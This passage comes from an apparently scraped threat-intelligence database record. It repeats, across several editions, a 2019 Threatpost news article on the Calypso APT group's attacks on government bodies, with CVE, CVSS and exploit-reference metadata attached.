This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T18:55:02", "modified": "2019-10-31T18:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", 
"https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143"], "lastseen": "2020-04-09T11:37:03", "history": [{"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "02cf3e03d7cf732490d89cdc2b4a219a", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. 
The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts a further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. 
Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. 
Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T18:55:02", "modified": "2019-10-31T18:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143"], "lastseen": "2019-10-31T19:05:14", 
"history": [], "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", 
"OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2019-10-31T19:05:14"}, "score": {"value": 7.0, "vector": "NONE", "modified": "2019-10-31T19:05:14"}}, "objectVersion": "1.4"}, "lastseen": "2019-10-31T19:05:14", "differentElements": ["modified", "published"], "edition": 1}, {"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "144a81444c294a319259cd5721fdb200", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. 
Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from the music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts further payloads in the form of a Windows batch script (BAT) for installation. The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. 
Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. 
This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T19:55:02", "modified": "2019-10-31T19:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", 
"https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143"], "lastseen": "2019-11-03T20:04:56", "history": [], "viewCount": 34, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": 
["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2019-11-03T20:04:56"}, "score": {"value": 7.0, "vector": "NONE", "modified": "2019-11-03T20:04:56"}}, "objectVersion": "1.4"}, "lastseen": "2019-11-03T20:04:56", "differentElements": ["cvelist"], "edition": 2}, {"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "6dab50944b149965a74c3c298ee15f60", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), 
which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>), one of the SMB flaws Microsoft patched in security bulletin MS17-010 in 2017) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), and the NSA hacking tools [EternalBlue and EternalRomance](<https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/>)), all in an effort to move laterally. The goal is to reach endpoints on a targeted organization\u2019s LAN and steal confidential data. The APT also uses a variety of legitimate administrative tools, which helps it stay under the radar, PT pointed out.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThese attacks succeeded largely because most of the utilities the group uses to move inside the network are widely used by the specialists everywhere for network administration,\u201d said Denis Kuvshinov, lead specialist in threat analysis at Positive Technologies, via email. \u201cThe group used publicly available utilities and exploit tools.\u201d\n\nThe Calypso RAT (it\u2019s unclear whether this is named after the Greek goddess from the Odyssey, the fruit drink, the island backbeat familiar from the music world or something else altogether) is a custom affair. It contains a dropper for first-stage infection, which then extracts further payloads in the form of a Windows batch script (BAT) for installation. 
The BAT file contains variables that can be invoked to have it save files, modify services and modify registry keys.\n\nPT analysis showed that the dropper next executes shellcode, which provides the interface for communicating with the command-and-control (C2) server and for downloading various modules. Once the C2 connection is made, the shellcode sends the C2 information about the infected computer, via TCP and SSL (such as computer name, current date, OS version, 32-bit vs. 64-bit OS and CPU, and IP addresses on network interfaces and their MAC addresses).\n\nCalypso RAT next can execute a total of 12 commands in the form of modules, each of which is self-contained and has two communication pipelines: One for transmitting data from the module to C2, and the other for receiving data from C2. Each module has a unique ID assigned by C2.\n\nAmong the commands are directions to launch three threads.\n\n\u201cOne is a heartbeat sending an empty packet to C2 every 54 seconds,\u201d explained PT, in the analysis. \u201cThe other processes and executes commands from C2. As for the third thread, we could not figure out its purpose, because the lines implementing its functionality were removed from the code. All we can tell is that this thread was supposed to \u2018wake up\u2019 every 54 seconds, just like the first one.\u201d\n\nIn some attacks, the backdoor has also fetched executables, including the FlyingDutchman malware, which includes functions such as screenshot capture, remote shell, and file system operations.\n\nAs for attribution, PT said that its forensics indicate that the discovered APT group is likely to be of Asian origin and is Chinese-speaking. 
The firm reached this conclusion because in some of the attacks, the hackers accidentally disclosed their real IP addresses, which belonged to Chinese providers.\n\n\u201cThe IP address belongs to China Telecom,\u201d according to a PT analysis [launched Thursday](<https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5>). \u201cWe believe the attackers could have been careless and set up the proxy server incorrectly, thus disclosing their real IP address. This is the first piece of evidence supporting the Asian origins of the group.\u201d\n\nFurther, the researchers noted that in one of the attacks the group used [PlugX malware](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>) \u2014 traditionally used by many Chinese APT groups. Calypso also used the Byeby trojan, which was involved in the China-linked [SongXY malware campaign](<https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/>) in 2017.\n\n\u201cThe group has several successful hacks to its credit, but still makes mistakes allowing us to guess its origins,\u201d PT concluded. \u201cAll data given here suggests that the group originates from Asia and uses malware not previously described by anyone\u2026We keep monitoring the activities of Calypso closely and expect the group will attack again.\u201d\n\n_**What are the top mistakes leading to data breaches at modern enterprises? 
Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "published": "2019-10-31T19:55:02", "modified": "2019-10-31T19:55:02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/calypso-apt-target-governments/149773/", "reporter": "Tara Seals", "references": ["https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010", "https://threatpost.com/fin6-target-ecommerce/147847/", "https://threatpost.com/chinas-apt3-pilfers-cyberweapons-nsa/148086/", "https://threatpost.com/newsletter-sign/", "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/#id5", "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "https://www.ptsecurity.com/ww-en/analytics/cybersecurity-threatscape-q4-2017/", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART", "https://attendee.gotowebinar.com/register/3127445778613605890?source=ART"], "cvelist": ["CVE-2017-0143", "CVE-2019-19781"], "lastseen": "2020-02-08T11:31:51", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-19781", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-111238", "SMNTC-96703"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54"]}, {"type": "freebsd", "idList": ["2BAB995F-36D4-11EA-9DAD-002590ACAE31"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:155904", "PACKETSTORM:155905"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250"]}, {"type": "nessus", "idList": 
["CITRIX_NETSCALER_CTX267027.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE", "MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL"]}, {"type": "threatpost", "idList": ["THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B8014941B9C018B67E06AFB27232454B", "THREATPOST:22158E449B59A11A581F1B8DDD309409", "THREATPOST:67CB5FDEB8A8DBBD7D08DBDAA2922ED2", "THREATPOST:CCF7941898F3992B3F68A48BA615C9D3", "THREATPOST:ABFFD895AAFB5901FF53611D96102FE1", "THREATPOST:8F656AF341505CA4322427DF6750F18D", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:233D38EB430EAD19986BB496F757AC76", "THREATPOST:6F4D076CD2B99D42353A5547FDBB288C"]}, {"type": "zdt", "idList": ["1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824"]}, {"type": "thn", "idList": ["THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8"]}, {"type": "cert", "idList": ["VU:619785"]}, {"type": "exploitdb", "idList": ["EDB-ID:47930", "EDB-ID:47901"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2020-02-08T11:31:51"}, "score": {"value": 6.2, "vector": "NONE", "modified": "2020-02-08T11:31:51"}}, "objectVersion": "1.4"}, "lastseen": "2020-02-08T11:31:51", 
"differentElements": ["cvelist"], "edition": 3}, {"bulletin": {"id": "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "hash": "144a81444c294a319259cd5721fdb200", "type": "threatpost", "bulletinFamily": "info", "title": "Calypso APT Emerges from the Shadows to Target Governments", "description": "A newly discovered APT group, dubbed Calypso after a custom malware RAT that it uses, has been targeting state institutions in six different countries since 2016.\n\nGovernment organizations in India (34 percent), Brazil and Kazakhstan (18 percent respectively), Russia and Thailand (12 percent respectively) and Turkey (6 percent) have all been successfully infiltrated at some point, according to analysts at Positive Technologies (PT), which first spotted the group in March.\n\nTo that point, the typical _modus operandi_ of the threat actors consists of infiltrating the network perimeter by exploiting a Windows SMB remote code-execution vulnerability ([CVE-2017-0143](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)) or by using stolen credentials. Once inside the network, the group injects a backdoor RAT program \u2013 the Calypso web shell \u2013 that it uses to execute commands and upload utilities and malware (including well-known tools like [Mimikatz](<https://threatpost.com/fin6-target-ecommerce/147847/>), 